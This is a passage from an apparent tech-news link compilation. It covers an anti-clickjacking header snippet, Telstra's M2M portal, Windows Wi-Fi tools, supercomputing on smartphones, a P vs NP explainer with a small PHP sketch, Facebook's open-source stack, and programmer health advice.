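function anti_framing_headers()
{
  return array(
    'X-Frame-Options: DENY',
    "Content-Security-Policy: frame-ancestors 'none'",
  );
}

// Usage on the sign-in page, before any output is sent:
// foreach (anti_framing_headers() as $h) { header($h); }
```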

If a user is trained to hand over their password to anyone who asks for it, then their data isn’t safe.

Summary

While we’ve covered a lot in this article, it still only skims the surface of web application security. Any developer interested in building truly secure applications has to be on top of their game at all times. Stay up to date with various security-related mailing lists, and make sure all developers on your team are clued in. Sometimes it may be necessary to sacrifice features for security, but the alternative is far scarier.

Finally, I’d like to thank the Yahoo! Paranoids for all their help in writing this article.

Further reading

  1. OWASP Top 10 security risks
  2. XSS
  3. CSRF
  4. Phishing
  5. Code injection
  6. PHP’s input filters
  7. Password anti-pattern
  8. OAuth
  9. Facebook Like button click-jacking
  10. Anti-anti frame-busting
  11. The Yahoo! Security Center also has articles on how users can protect themselves online.

Link

Telstra unveils machine to machine portal

It’s not just humans who use Telstra’s Next G mobile network to place calls and share data. Increasingly, inanimate objects such as cars, vending machines and even digital photo frames are doing the same. And Telstra hopes they will do it even more.

The company has launched a new control centre allowing customers to more easily design, deploy and manage mobile connections between non-human systems — known as “machine to machine” connections.

The technology allows SIM mobile chips and transmitters to be embedded in devices and transmit data without human interaction. A vending machine, for example, could automatically notify a soft drink manufacturer when it needed a refill — or a picture frame could automatically download new photos and display them as they were uploaded to Flickr.

Telstra has been providing M2M services for some time — its biggest customer has close to 100,000 SIMs deployed.

It has announced a new partnership with US-based company Jasper Wireless to launch the portal and revamp the way it handles SIMs to be used for M2M purposes.

Previously, Telstra had required each individual SIM to be activated in much the same way that mobile phone SIMs are used. However, now the telco will allow customers to purchase SIMs in bulk that are pre-prepared for M2M purposes. No interaction with Telstra’s systems will be required to activate them.

The telco’s director of M2M products and partnerships, Mike Cihra, said the M2M market was currently worth about $300 million annually in Australia, but Telstra expects it to exceed $1 billion over the next four years. And Telstra wants a big slice of that pie.

“What we need to do is put a big sign out the front saying Telstra is open for business — we are the default provider,” he told journalists last week.

Telstra’s director of its Enterprise and Government division, John Paitaridis, said the existing sectors interested in M2M devices were areas such as manufacturing, logistics, transportation, healthcare, utilities and security.

But new markets were also opening up, he said — for example with relation to eReader and GPS navigation devices, vending machines, picture frames and so on.

Previously, he said, customers had had a limited ability to manage their remote SIMs. But the Jasper portal would change that. And Telstra is opening the application programming interface to its system and providing small M2M kits so that even small software developers can get involved.

Telstra has also revamped its bulk billing plans to fit the new M2M paradigm. For example, it now has a plan offering 30GB a month for $1500, which includes as many SIMs as users want, along with a smaller plan offering 2GB for $200. The developer kit, which includes three test SIMs and 50MB of data over a six-month period, goes for $199.

Link

6 useful Wi-Fi tools for Windows

We live in a mobile world; if you have a laptop (and who doesn’t?), that means constantly connecting to the Internet via Wi-Fi. You most likely use Wi-Fi not just when you’re on the road at cafés, airports or hotels, but to connect to your home network too. You might even connect to a wireless network at the office.

Here’s the problem: Windows doesn’t do a particularly good job of providing Wi-Fi tools. Yes, it will let you search for and connect to nearby networks, but that’s about the extent of it. What if you want to get detailed information about every Wi-Fi network within range, troubleshoot your network, turn your laptop into a portable Wi-Fi hot spot or keep yourself safe at public hot spots? Windows is no help.

That’s why we’ve rounded up these six downloads. They’ll do all these things and more. Five out of the six are free; the other is inexpensive and lets you try it out first.

InSSIDer

MetaGeek’s InSSIDer is a great tool for finding Wi-Fi networks within range of your computer and gathering a great deal of information about each. It’s also useful for troubleshooting problems with your own Wi-Fi network.

For every Wi-Fi network InSSIDer finds, it shows you the MAC address of the router, the router manufacturer (if it can detect it — it usually does), the channel it’s using, the service set identifier (SSID) or public name of the network, what kind of security is in place, the speed of the network and more. In addition, it displays the current signal strength of the network, as well as its signal strength over time.

How would you use the software to troubleshoot your wireless network? If you see that your network uses the same channel as nearby networks with strong signals, you’ll know that you should change the channel your network transmits over and thereby cut down on potential conflicts. (Most routers have a settings screen that lets you do this.)

You can also use the software to detect “dead zones” that don’t get a strong Wi-Fi connection. Walk around your home or office with InSSIDer installed on your laptop to see where signal strength drops. You can either avoid using a computer in those spots or else try repositioning the wireless router to see if it helps with coverage.

Whether you need to troubleshoot a network or find Wi-Fi hot spots to which you want to connect — or you’re just plain curious — this is one app you’ll want to download and try.

Price: Free

Compatible with: Windows XP, Vista and 7 (32- and 64-bit)

Download InSSIDer

Xirrus Wi-Fi Inspector

This is another excellent program that sniffs out Wi-Fi networks and shares pertinent information about them, such as how close or far away they are. Xirrus Wi-Fi Inspector shows any nearby hot spots on a radar-like display. A separate pane offers detailed information about every hot spot it finds, including signal strength, the kind of network (802.11n, for example), the router vendor, the channel on which the network transmits and whether it’s an access point or an ad hoc network.

In a pane next to the radar, Wi-Fi Inspector shows you even more detailed information about the network to which you’re currently connected, including your internal IP address, external IP address, DNS and gateway information, and so on.

Why use Xirrus Wi-Fi Inspector rather than MetaGeek’s InSSIDer? Wi-Fi Inspector’s simpler, cleaner layout makes it easier to see information about all of the hot spots at a glance. It also shows the relative physical distance between you and each hot spot on its display. And there’s no denying the overall coolness factor of a radar-like display.

However, if you want more detailed information, including the relative signal strengths of all nearby wireless networks, InSSIDer is a better bet.

Price: Free

Compatible with: Windows XP SP2+, Vista and 7

Download Xirrus Wi-Fi Inspector

Connectify

This very nifty piece of free software lets you turn a Windows 7 PC (it only works with Windows 7) into a Wi-Fi hot spot that can be used by nearby devices — your smartphone, for example, or devices that your co-workers are using in the same location.

The PC on which you install it will, of course, need to be connected to the Internet itself and have Wi-Fi capability so it can provide access to other devices. The computer doesn’t necessarily need a wired connection to the Internet (although it won’t hurt to have one); its Wi-Fi card can perform double-duty as Wi-Fi signal receiver and transmitter.

Setting up a hot spot is simple: Once you have a connection, run Connectify on your PC and give your hot spot a name and password. Your computer’s Wi-Fi card will begin broadcasting a Wi-Fi signal that other devices can connect to, in the same way they can connect to any other hot spot. (Your PC card will broadcast in whatever Wi-Fi protocol it was built for. It also should support devices that use earlier protocols — for example, an 802.11n signal should allow 802.11b/g/n devices to connect.)

Since your hot spot is password-protected, only people who know the password can use it; the signal is secured with WPA2-PSK encryption.

You can even use Connectify to set up a local network without an external Internet connection. Run it as a hot spot, and nearby devices can connect to each other in a network, even though there’s no Internet access. You can use this for sharing files in a workgroup or setting up a network for multiplayer games.

Note that I had problems connecting my Mac to a Windows 7 machine running a Connectify-created hot spot, but I was able to make the connection with other PCs and devices.

Price: Free

Compatible with: Windows 7

Download Connectify

WeFi

Tools like InSSIDer and Xirrus Wi-Fi Inspector are great for finding hot spots that are currently in range of your laptop. But if you want to find hot spots in other locations — a part of town that you’ll be in later in the day, for example, or a city you’ll be visiting next week — you’ll want to give WeFi a try.

Like other Wi-Fi sniffing tools, WeFi uses your Wi-Fi card to find your current location and show you nearby hot spots. You can click on a link to see a particular hot spot on a map, along with its address. (Note, however, that in practice I found it was not always accurate.)

But you can also type in a different location to see hot spots near that location. Click the Wi-Fi Maps tab and enter an address; a map of that location will appear on Google Maps and you’ll be provided with various details about nearby hot spots, such as type (municipal, hotel, café and so on), distance from the location and whether there’s an access fee.

WeFi also helps you manage how to connect to hot spots. It can, for example, automatically connect you only to your favorite hot spots or only to hot spots that have been discovered by other WeFi members.

The basic version of WeFi is free, but there’s also a version called WeFi Premium that you have to pay for. WeFi Premium finds and connects you to paid hot spots. The amount you pay for WeFi Premium varies depending on whether you want to pay an hourly rate, prepay for a certain number of minutes and so on. You’d be better off skipping WeFi Premium; it’s much easier to find paid hot spots on your own.

Price: Free

Compatible with: Windows XP, Vista and 7

Download WeFi

Hotspot Shield

When you connect to the Internet via a public hot spot, you put yourself at risk because someone might try to sniff your packets or otherwise snoop on what you’re doing online. Hotspot Shield, a free, lightweight piece of software from AnchorFree, promises to keep you safe by creating a secure VPN connection and encrypting all of your communications.

As you connect to a hot spot, simply run Hotspot Shield, and it will begin protecting you using the HTTP Secure (HTTPS) protocol. It launches a tab to show you that you’re connected; to disconnect, click the Disconnect button on the tab. To connect again, click the Connect button. You can also connect and disconnect by right-clicking the program’s icon in the System Tray.

You’ll need to take some care when you first install Hotspot Shield. If you don’t want its toolbar installed in your browser, uncheck the box next to “Include the Hotspot Shield Community Toolbar.” Also, make sure to uncheck the boxes for setting Hotspot Shield Private Search as your default search, setting your home page to the Hotspot Shield Private Search page, fixing “Page Not Found” errors, and enabling you to get instant alerts from the software — those options won’t do you much good and will likely annoy you.

A few caveats: When you run the software, it will open a browser tab to the product’s home page, which has ads on it. You can close that tab if you want; the program works fine without it open. Also, according to a page on the Hotspot Shield Web site, you might see targeted ads appear above Web pages you visit. That hasn’t happened to me, although I’ve seen complaints elsewhere around the Web about intrusive ads. Finally, some people who have downloaded the program have complained that it is unstable, or they were unable to uninstall it. In my tests I didn’t run across those problems, but be forewarned that others have reported them.

While AnchorFree offers Hotspot Shield for free, other companies sell similar VPN software products to protect you at public hot spots. ConnectInPrivate, for example, offers software and a service that costs $14.99 per month.

Price: Free

Compatible with: Windows 2000, XP, Vista and 7 (also Mac OS X 10.4, 10.5 and 10.6)

Download Hotspot Shield

Plug and Browse

If you use your laptop to connect to more than one wireless or wired network, you might be spending more time than you’d like switching network settings.

For example, if you’re a typical notebook user, at work you might have a static IP address, a default network printer, a set of scripts that need to be run, proxy servers for security and a set of mapped network drives. At home, you might have a DHCP-assigned network address on a wireless network as well as a home printer, and you might use Windows Firewall but no proxy servers. And then there’s that coffee shop hot spot that you visit regularly with its own set of requirements, such as a DHCP-assigned network address.

Each time you switch networks, chances are that you have to tweak settings such as your default printer, mapped network drives, proxy servers and so on.

Plug and Browse from Interactive Studios puts an end to all that manual configuration. It allows you to create profiles for all the networks you use, and then when you switch from one network to another, you simply choose the new network’s profile. All your settings will be intact.

A very nice touch is that you can tell Plug and Browse to automatically create a profile for you and it will grab all of your current settings for the network to which you’re connected. You can still edit the settings after that if you need to.

Price: $39.99 (with 30-day free trial)

Compatible with: Windows XP, Vista and 7

Download Plug & Browse

Link

Supercomputing: There’s an App for That

What if you could perform supercomputing calculations in real-time, on your smartphone, in any location?

Researchers at the Massachusetts Institute of Technology (MIT), collaborating with staff at the Texas Advanced Computing Center (TACC), have created an application that does just that.

The team performed a series of expensive high-fidelity simulations on the Ranger supercomputer to generate a small “reduced model” which was transferred to a Google Android smart phone. They were then able to solve problems on the phone and visualize the results on the fly.

The project proved the potential for reduced order methods to perform real-time and reliable simulations for complicated problems on handheld devices.

“You don’t need to have a high-powered computer on hand,” said David Knezevic, a post-doctoral associate in mechanical engineering at MIT working in the lab of Prof. Anthony Patera. “Once you’ve created the reduced model, you can do all the computations on a phone.”

A screenshot of an engineering application developed by the researchers for the Android smart phone.

This is not the first time that model reduction algorithms have been used to ameliorate the complexities of large-scale physical simulations.  The advantage of the system designed by Knezevic and his colleagues is its rigorous error bounds, which tell a user the range of possible solutions, and provide a metric of whether an answer is accurate or not. The error bounds are based on mathematical theory developed in Prof. Patera’s research group at MIT over a number of years.

“We have a bound on how much accuracy we’re losing with our reduced model, so we can say with rigor that we’re doing supercomputing on a phone,” Knezevic said.

The reduced model is constructed by focusing the supercomputer simulations on a range of parameters that are of interest to the user.  Once the construction is finished, the model can be used to perform simulations for new parameters, nearly instantaneously, for use in real-world applications.

“We’re interested in accurate, real-time computing, and the calculations on the phone take less than two seconds,” Knezevic said.

So far the team has developed a number of demonstration problems that run on the system, mainly fluid dynamics, acoustics and heat flow simulations. However, many different problems can be handled with this method.

In its smartphone form, the researchers imagine their method could be applied to “in the field” inverse problems like landmine detection, as well as to design problems like determining the optimal shape for structures.

David Knezevic is a post-doctoral associate in mechanical engineering at MIT. John Peterson serves as a research associate in the high performance computing group at TACC.

TACC provided access to Ranger to compute the problems and TACC staff collaborated with Knezevic to debug and parallelize the code so it could scale efficiently to thousands of processors on the system.

“The payoff for model reduction is larger when you can go from an expensive supercomputer solution to a calculation that takes a couple of seconds on a smart phone,” Knezevic explained. “That’s a speed up of orders of magnitude.”

The improvements allowed the team to compute three-dimensional solutions, and to work with the complicated class of non-linear equations in which the researchers were interested.

“After collaborating on the code for several months, it was much more powerful, flexible and efficient,” said John Peterson, a research associate in the high performance computing group at TACC and a collaborator on the project.

Using the smart phone application, researchers can change values, improve the error bounds by increasing the complexity of the local calculation, and even visualize the solution interactively in three dimensions.

“It’s demonstrating that with a small processor, you can still get a meaningful answer to a big problem,” Peterson said.

The real impact of the system may come in the application of these methods to aircraft or automobiles, which use control systems to react to inputs from the environment in order to achieve optimal safety and performance. Examples include traction control in cars and stabilization systems in jet fighters.

“If you have sensors feeding in data to the reduced order model system, then it could solve the equation corresponding to the input data, and indicate the appropriate response in real-time based on the calculations you performed on a supercomputer,” Knezevic said.

“The control system needs a simplified model of the aircraft so that it can make split-second updates to the ailerons and flaps,” Peterson added. “That simplified model is the reduced basis model.”

Creating a lightweight instantiation of this technology in the form of a smart phone application signals many new possibilities for reduced order modeling in applied science and engineering.

Concluded Knezevic: “When you tell people you can solve a problem that would normally take two hours on Ranger in one second, with guaranteed error bounds, people instantly understand what model reduction is all about.”

Link

P vs. NP for Dummies

A reader named Darren commented on my last post:

I have this feeling that this whole P and NP thing is not only a profound problem that needs solving, but something that can be infinitely curious to try and wrap your mind around…

Thing is- there’s a whole world of great minded, genius hackers out here that can’t understand one iota of what anyone is talking about. We’re not your traditional code-savvy hackers; we’re your inventors, life hackers, researchers, scientists… and I think I can speak for most of us when I say: We would love to take the time to really dive into this thread, but we ask that someone (you) write a blog that breaks this whole thing down into a rest-of-the-world-friendly P/NP for dummies… or at least explain it to us like we’re stupid as hell… at this point I’m really okay with even that.

I’m of course the stupid one here, for forgetting the folks like Darren who were enticed by L’Affaire Deolalikar into entering our little P/NP tent, and who now want to know what it is we’re hawking.

The short answer is: the biggest unsolved problem of theoretical computer science, and one of the deepest questions ever asked by human beings!  Here are four informal interpretations of the P vs. NP problem that people give, and which I can endorse as capturing the spirit of what’s being asked:

  • Are there situations where brute-force search—that is, trying an exponential number of possibilities one-by-one, until we find a solution that satisfies all the stated constraints—is essentially the best algorithm possible?
  • Is there a fast algorithm to solve the NP-complete problems, a huge class of combinatorial problems that includes scheduling airline flights, laying out microchips, optimally folding proteins, coloring maps, packing boxes as densely as possible, finding short proofs of theorems, and thousands of other things that people in fields ranging from AI to chemistry to economics to manufacturing would like to solve?  (While it’s not obvious a priori, it’s known that these problems are all “re-encodings” of each other.  So in particular, a fast algorithm for any one of the problems would imply fast algorithms for the rest; conversely, if any one of them is hard then they all are.)
  • Is it harder to solve a math problem yourself than to check a solution by someone else? [[This is where you insert a comment about the delicious irony, that P vs. NP itself is a perfect example of a monstrously-hard problem for which we could nevertheless recognize a solution if we saw one—and hence, part of the explanation for why it’s so hard to prove P≠NP is that P≠NP…]]
  • In the 1930s, Gödel and Turing taught us that not only are certain mathematical statements undecidable (within the standard axiom systems for set theory and even arithmetic), but there’s not even an algorithm to tell which statements have a proof or disproof and which don’t.  Sure, you can try checking every possible proof, one by one, but if you haven’t yet found a proof, then there’s no general way to tell whether that’s because there is no proof, or whether you simply haven’t searched far enough.  On the other hand, if you restrict your attention to, say, proofs consisting of 1,000,000 symbols or less, then enumerating every proof does become possible.  However, it only becomes “possible” in an extremely Platonic sense: if there are 2^1,000,000 proofs to check, then the sun will have gone cold and the universe degenerated into black holes and radiation long before your computer’s made a dent.  So, the question arises of whether Gödel and Turing’s discoveries have a “finitary” analogue: are there classes of mathematical statements that have short proofs, but for which the proofs can’t be found in any reasonable amount of time?

Basically, P vs. NP is the mathematical problem that you’re inevitably led to if you try to formalize any of the four questions above.
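To make the gap between checking and searching concrete, here is a small sketch using subset sum, a standard NP-complete problem: given a list of numbers, is there a subset that adds up to a target? The function names check_subset() and find_subset() and the sample numbers are made up for illustration. Checking a proposed answer takes one pass over it, while the only search shown here tries subsets one by one, and there are 2^n of them for n numbers.

```php
<?php
// Checking a proposed solution: one pass over the chosen positions.
function check_subset(array $numbers, array $indices, $target)
{
  // A position may be used at most once
  if (count($indices) !== count(array_unique($indices))) {
    return false;
  }
  $sum = 0;
  foreach ($indices as $i) {
    if (!array_key_exists($i, $numbers)) {
      return false;
    }
    $sum += $numbers[$i];
  }
  return $sum === $target;
}

// Brute-force search: try every non-empty subset until one checks out.
function find_subset(array $numbers, $target)
{
  $numbers = array_values($numbers);
  $n = count($numbers);
  // Each bitmask from 1 to 2^n - 1 names one non-empty subset
  for ($mask = 1; $mask < (1 << $n); $mask++) {
    $indices = array();
    for ($i = 0; $i < $n; $i++) {
      if ($mask & (1 << $i)) {
        $indices[] = $i;
      }
    }
    if (check_subset($numbers, $indices, $target)) {
      return $indices;
    }
  }
  return null; // no subset adds up to the target
}
```

With six numbers the loop runs at most 63 times; with sixty it could run more than 10^18 times, while check_subset() would still only add up at most sixty values. Whether that search can always be replaced by something fundamentally faster is the question.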

Admittedly, in order to state the problem formally, we need to make a choice: we interpret the phrase “fast algorithm” to mean “deterministic Turing machine that uses a number of steps bounded by a polynomial in the size of the input, and which always outputs the correct answer (yes, there is a solution satisfying the stated constraints, or no, there isn’t one).”  There are other natural ways to interpret “fast algorithm” (probabilistic algorithms? quantum algorithms? linear time? linear time with a small constant? subexponential time? algorithms that only work on most inputs?), and many are better depending on the application.  A key point, however, is that whichever choices we made, we’d get a problem that’s staggeringly hard, and for essentially the same reasons as P vs. NP is hard!  And therefore, out of a combination of mathematical convenience and tradition, computer scientists like to take P vs. NP as our “flagship example” of a huge class of questions about what is and isn’t feasible for computers, none of which we know how to answer.

So, those of you who just wandered into the tent: care to know more?  The good news is that lots of excellent resources already exist.   I suggest starting with the Wikipedia article on P vs. NP, which is quite good.  From there, you can move on to Avi Wigderson’s 2006 survey P, NP and mathematics – a computational complexity perspective, or Mike Sipser’s The History and Status of the P vs. NP Question (1992) for a more historical perspective (and a translation of a now-famous 1956 letter from Gödel to von Neumann, which first asked what we’d recognize today as the P vs. NP question).

After you’ve finished the above … well, the number of P vs. NP resources available to you increases exponentially with the length of the URL.  For example, without even leaving the scottaaronson.com domain, you can find the following:

Feel free to use the comments section to suggest other resources, or to ask and answer basic questions about the P vs. NP problem, why it’s hard, why it’s important, how it relates to other problems, why Deolalikar’s attempt apparently failed, etc.  Me, I think I’ll be taking a break from this stuff.

Link

Inside Facebook’s Open Source Infrastructure

Facebook connects its 500 million users using an array of open source software to enable social networking as well as data intelligence. Facebook’s open source Web serving infrastructure has a lot more than just the traditional LAMP (Linux/Apache/MySQL/PHP) stack behind it.

During a keynote session at the OSCON open source conference, David Recordon, the senior open programs manager at Facebook, detailed the infrastructure in use today at Facebook.

At the language level of the stack, Recordon noted that Facebook is using PHP by way of its own HipHop PHP runtime project. Facebook officially announced HipHop earlier this year as a way to speed up PHP operations, improve efficiency and decrease CPU utilization.

At the database tier, Recordon said Facebook primarily stores user data in the MySQL database. He said that Facebook runs thousands of MySQL nodes, though he added that Facebook doesn’t care that MySQL is a relational database.

“We generally don’t use it (MySQL) for Joins and we aren’t running complex queries that are pulling multiple tables together inside of a database,” Recordon said.

Recordon said that Facebook has three different layers for data. The first layer is the database tier, which is the primary data store and where MySQL sits. On top of that, Facebook uses Memcached caching technology, then a Web server on top of that to serve the data.

“We’re actually using our Web server to combine the data to do joins and that’s where HipHop is so important,” Recordon said. “Our Web server code is fairly CPU-intensive because we’re doing all these different sorts of things with data.”
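As a rough illustration of what combining data in the Web server rather than in the database can mean, the sketch below joins two sets of rows in PHP. This is not Facebook’s code; the function name join_posts_with_authors() and the row fields (id, name, user_id, text) are hypothetical, and the rows stand in for results of two separate single-table lookups.

```php
<?php
// Hypothetical application-level join: attach an author name to each post.
function join_posts_with_authors(array $posts, array $users)
{
  // Index users by id so each post needs only one array lookup
  $by_id = array();
  foreach ($users as $u) {
    $by_id[$u['id']] = $u;
  }

  $joined = array();
  foreach ($posts as $p) {
    if (!isset($by_id[$p['user_id']])) {
      continue; // inner-join behavior: skip posts with no matching user
    }
    $joined[] = array(
      'post'   => $p['text'],
      'author' => $by_id[$p['user_id']]['name'],
    );
  }
  return $joined;
}
```

The work a SQL JOIN would do inside the database happens here in PHP loops, which is consistent with the quote above about the Web server code being CPU-intensive.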

In addition to MySQL, Facebook also uses a pair of NoSQL-type databases: Cassandra and HBase, the latter of which is part of the Apache Hadoop project.

“While we store the majority of our user data inside of MySQL, we have about 150 terabytes of data inside of Cassandra, which we use for inbox search on the site and over 36 petabytes of uncompressed data in Hadoop overall.”

Recordon said that Facebook’s Hadoop cluster has a little over 2,200 servers with a total of 23,000 CPU cores. He added that by the end of the year, Facebook expects to be storing over 50 petabytes worth of information.

The Hadoop components help Facebook use its data to understand how people are using the site. Recordon said that Facebook uses data analysis for all sorts of product decisions including how Facebook sends e-mails and how it ranks news feeds.

In order to help enable the data analysis, Facebook uses an open source technology called Scribe.

“Scribe takes the data from our Web servers and funnels it into HDFS (Hadoop Distributed File System) and into our Hadoop warehouses,” Recordon said. “The problem that we originally ran into was too many Web servers trying to send data to one place, so Scribe breaks it up into a series of funnels for collecting data over time.”

Recordon said that Facebook’s Hadoop cluster is vital to the business and the system is highly monitored and maintained. Facebook has what it calls a Platinum Hadoop cluster, plus a second cluster called the Silver Hadoop cluster where data from the Platinum cluster is replicated.

Additionally Facebook uses the Apache Hive technology, which provides a SQL interface on top of Hadoop to do data analysis.

“A large part of our infrastructure is open source and we really think that it’s important in terms of being able to allow developers that are building with the Facebook platform to scale using the same pieces of infrastructure that we use,” Recordan said. “Fundamentally we’re all running into the same sets of challenges.”


Common Programmer Health Problems

I’m currently working on the last few lessons in Learn Python The Hard Way and I want to include a lesson on general health problems programmers run into during their careers. I find many programmers seem to ignore their body’s physical state when they’re coding, most likely due to the intense concentration required. I’m hoping other people could benefit by simply understanding a few health-related problems programming has almost caused me or caused many other people I know, and how I avoided them.

I probably won’t put this whole blog post into LPTHW since it’s a bit much, but I will make a shorter version of it. Please feel free to let me know if you hate it or like it or if you have some additional resources I could reference.

My Background And Qualifications

In the past I was a top qualified soldier in the US Army, and I have studied many martial arts. These days I’m not as into working out and studying martial arts as I used to be, instead focusing on yoga, meditation, and simpler activities. When I was younger I was incredibly fit, and still am because of habits and practices I ingrained in myself from an early age.

First a quick list of martial arts I’ve studied for various periods of time: Ninjutsu, Aikido, Judo, Muay Thai, Wing Tsung, Capoeira, and Arnis in no particular order. I would say Muay Thai is the one I studied most consistently, for probably about 6 years. The others I studied for about 1 or 2 years if I could. I moved around a lot so the only way to study was whatever was in the area.

Also, in the US Army I was at the top of my physical fitness exam, going from barely passing to maximum scores consistently in about 2 years. This involved about 2-4 hours of working out nearly every day if I remember it correctly, which in the Army isn’t that difficult. There’s really nothing else to do.

Finally, I’ve been the exact same weight, flexibility, and nearly the same strength my whole life, whether I worked out or not, which means that I probably can’t tell you about how to lose weight. I’m most likely genetically predisposed to be this way. That means you should adapt my advice to fit your life and what you’ve found healthy.

With all that being said, as I’ve gotten older I much more enjoy the less violent and more “supple” forms of exercise. I feel Yoga is excellent exercise because it’s deceptively difficult. I’d also vote for Pilates, swimming, dance, and anything that doesn’t cause direct impact on my body. I especially have to watch out for my hands for reasons I’ll explain in a bit.

Alright, that should give you an idea that I know something, but more importantly, while doing all of these things, I also wrote software professionally. After getting out of the Army I averaged about 8-16 hours of coding and study a day. I also touch type and I play guitar, yet I’ve mostly avoided carpal tunnel and other RSI problems.

Hopefully, my experience maintaining my physical health will help you gain some or keep yours.

Common Problems Programmers Face

Programming is a deceptively damaging field to be in, partly because it doesn’t seem like you’re doing much, and also because of the attitude many programmers have toward their body. You should care about keeping yourself healthy because, when your body is in good shape, that removes “friction” from your mental capacity so that it can focus on important things rather than annoying little problems with your physical wellness.

Obviously the advice on eating right, going outside, getting exercise has been said by everyone. I’m not really going to tell you how to eat, or work out, or how to do a martial art or something else to stay healthy. If you are interested in those things, then please find a professional who can train you and help you.

What I do want to cover are a set of particular problems programmers have from their daily profession. These are just simple really obvious things that for some reason programmers don’t realize aren’t supposed to be happening:

  • Pain in your wrists from Repetitive Strain Injury (RSI).
  • Problems with your eyes from staring at moving print for extended periods.
  • Back problems from poor posture, especially in the lower back and upper shoulders.
  • Bowel and urinary issues from not crapping and pissing when you should.
  • Dehydration from drinking too much caffeine and not enough water.
  • Problems with hemorrhoids and the prostate for guys from sitting too much. Yep, I’m gonna go there.
  • Vitamin D deficiency from lack of sunshine.
  • Sleeping disorders from staying up late and drinking too much coffee.
  • General stiffness and soreness from a lack of stretching in general.

I’ve had to struggle with all of these problems at one point in my life because of programming, guitar, or actually from lifting weights wrong. In each case I was able to get healthy and then avoid it the rest of my life, and really only deal with a few problems periodically. You may think some of these are stupid, but believe me, many programmers have these problems for various reasons even if you might not.

The General Cause

Overall the general cause of all of these problems can be summarized as treating programming as an obsession. You may want to be very good at it, like I did, so you exclude everything else in your life in order to master it. You don’t go to the bathroom, you have macho 10 hour coding sessions, you don’t eat right, and you buy into all manner of mythological beliefs about “real programmers”.

Truth is real programmers are kind of idiots. They don’t eat right. They don’t have sex on a regular basis. They can’t run without gasping for breath. They have huge problems with their internal organs not caused by disease. Really, it’s just not worth it if you have to kill yourself to be good at something.

So, as you read through each of these problems and how I’ve cured them, remember that it’s all about just having a balanced life and not being obsessed with coding or your business. Trust me when I say you will actually become better if you take it easy on yourself and stay healthy.

Wrist Pain

This is probably the one I struggle with the most, because I code and play guitar quite frequently and for long periods of time. I’ve had pain in my wrists periodically since I started coding professionally at 22, but I always had a set of Aikido exercises I did to get my wrists straight.

You see, Aikido has these fantastic wrist exercises that make your wrists strong and supple at the same time. They developed the exercises to avoid injuries during practice since many of the Aikido techniques involve wrenching, ripping, and breaking the joints in the arms, wrists, and shoulders.

For me these exercises have always fixed any misalignment and pain, and they’ve allowed me to code for long periods of time without much trouble. Typically the only time I’ll have problems is if I’ve switched keyboards and have a new odd keyboard layout, but if I do I simply do the exercises for about a week every time I go to code and they get strong again.

Now, if you have serious carpal tunnel or another kind of RSI then consult your physician before trying these. If you do them, then start very slowly, and do not try to make them hurt. Stretching should not hurt, it should just be “mildly uncomfortable”. If it hurts, then you are straining to do the stretch.

What you actually want to do is relax into every stretch you do. It’s hard to explain, but instead of forcing your joint to a certain position, bring it to that position and then think about relaxing it or “letting” it move a bit further.

Keep this in mind, and then here’s a set of videos that show you how to do each exercise:

Here’s how you use these exercises before you sit down to type (every time!):

  1. First, you need to warm up, so put your hands out in front of you and grab at the air as fast as you can 20 times. Then shake your hands, then rotate your wrists 10 times one direction and 10 times another.
  2. Start with the first exercise you’re best at, and do 5-10 of them at a medium speed.
  3. Continue through each one, but after each one shake your hands and arms and rotate your wrists to realign them. These exercises do some moving of the bones in your wrist, so shaking them sort of makes them settle back in.
  4. NEVER do too much strain on your wrists. Do just enough to get them going and feeling supple and relaxed, but the motto “no pain no gain” will only damage you.

Do these each time you go to type, every day, and any time you stop. It doesn’t take long to do them, and after a bit of discomfort as your wrists start to adapt and get realigned, you’ll start to feel better.

One more time though: DO NOT DO THIS WITHOUT CONSULTING A DOCTOR FIRST. You do these at your own risk, so don’t sue me if you fuck up your wrists because you didn’t pay attention. These exercises have been done for maybe thousands of years in various martial arts, so I know they aren’t dangerous but everyone is different. You could screw yourself up bad if you do them wrong, so if it hurts stop doing them and talk to a doctor!

Guitarists Are Worse

Programmers will get RSI but it’s nothing compared to what guitarists and bassists get. For various stupid reasons there are myths around many of the big name musicians and their claims of studying “8 hours a day” or “16 hours a day!”. Because of this guitarists will kill themselves and damage their hands, making it impossible to play.

Guitar is a hard instrument on your hands, so even a little pain can put you out of commission. I learned this the hard way in school because, like an idiot, I believed my instructors when they said I had to study 8 hours a day. I literally thought they meant 8 hours straight, so I did that for about a month and then BAM!

Fucked up my thumb and gave it a bone spur and all my fingers hurt like crazy. My wrists were solid, but my fingers just couldn’t take it. Like an idiot I didn’t listen to what I already knew which is any new activity has to be gradually increased like any other work out.

The only way I could fix this, and it took nearly 1.5 years, was to do the following:

  1. Find guitars that didn’t hurt my hands. The idea that you can “play any guitar” is crap. Get the best guitar you can that doesn’t hurt you.
  2. Do the above exercises, and then some more for my fingers.
  3. Start slowly rebuilding my fingers and thumb by doing a set of exercises to improve their strength and relaxation.
  4. Constantly focus on relaxing while playing so that I could use a lighter touch.
  5. Avoid bends as they hurt my hands and caused me injuries.
  6. Changed my position and playing style so that I’m able to move around quickly without having to grip the guitar, instead my thumb is on the back of the guitar where it’s comfortable.
  7. Adjusted the height of my guitar so that it was comfortable on my shoulder and hands to play.
  8. Always play standing up now, rarely sitting down for long periods of time because the position is awkward, and if I do I keep the same position.

After doing that for the last year my hands are finally feeling good and have healed up, and I’ve now got good habits that prevent me from injuring myself. I’m an old guy so these things are important, but that also means I can’t do anything that might hurt my hands.

My hands are my life right now, so that means no boxing, capoeira, or anything else I really want to study. I have too much riding on my hands to waste it on a punching bag.

Eye Strain

I think this isn’t as much of a problem as it was for me, but you have to watch out for your eyes. I had perfect, better-than-20/20 vision when I was younger, but from decades of computer use my eyes are “slightly off”. I have a minor correction in glasses and these days I just wear them all the time even if I only need them a little bit. The world is just annoyingly fuzzy without them.

Back in the bad old days we stared at CRT screens all day, which had horrible annoying flicker and screwed up quite a few eyes. These days it’s not the flicker so much as the poor font rendering on most LCD screens. Thanks to patents owned by Apple (I think) many computers can’t render fonts well on an LCD screen. Some folks though think Apple’s font rendering looks “fuzzy” so your mileage may vary considerably.

In my case I try to get out for about 2 hours a day and not look at a computer. Either I do something that doesn’t involve reading like play guitar, or I go for a walk or to the park. I may not do this for a full 2 hours at once, but I try to not stare at a computer screen for at least 2 hours over the whole day.

This will also help with headaches you might have. Frequently programmers will think that the lighting in a room is what gives them headaches from using a computer, but really it’s bad posture, shitty fonts, not drinking enough water, and just using the computer for too long at a stretch.

